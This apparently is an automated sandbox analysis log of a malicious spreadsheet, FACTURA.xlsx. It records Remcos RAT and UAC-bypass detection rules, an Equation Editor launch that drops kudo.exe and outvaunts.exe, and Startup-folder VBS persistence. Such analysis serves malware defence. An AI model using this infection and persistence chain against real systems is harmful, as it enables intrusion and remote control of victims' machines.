              Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
              Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
              Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
              Memory dumps (type: MEMORY) matched by all three rules above:
              Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Process memory spaces (type: MEMORYSTR) matched by Windows_Trojan_Remcos_b296e965 only:
              Source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTR
              Source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@73/75@1/2
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0086A06A GetLastError,FormatMessageW,5_2_0086A06A
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_008581CB AdjustTokenPrivileges,CloseHandle,5_2_008581CB
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_008587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_008587E1
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013B81CB AdjustTokenPrivileges,CloseHandle,6_2_013B81CB
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Code function: 6_2_013B87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_013B87E1
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0086B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,5_2_0086B3FB
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0087EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_0087EE0D
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_0086C397 CoInitialize,CoCreateInstance,CoUninitialize,5_2_0086C397
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Code function: 5_2_00804E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,5_2_00804E89
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$FACTURA.xlsx
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC31F.tmp
              Source: FACTURA.xlsx OLE indicator, Workbook stream: true
              Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
              Source: FACTURA.xlsx ReversingLabs: Detection: 63%
              Source: FACTURA.xlsx Virustotal: Detection: 45%
              Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\kudo.exe "C:\Users\user\AppData\Local\Temp\kudo.exe"
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\Temp\kudo.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\kudo.exe "C:\Users\user\AppData\Local\Temp\kudo.exe"
              Source: C:\Users\user\AppData\Local\Temp\kudo.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\Temp\kudo.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: unknown unknown
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exe Process created: unknown unknown
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
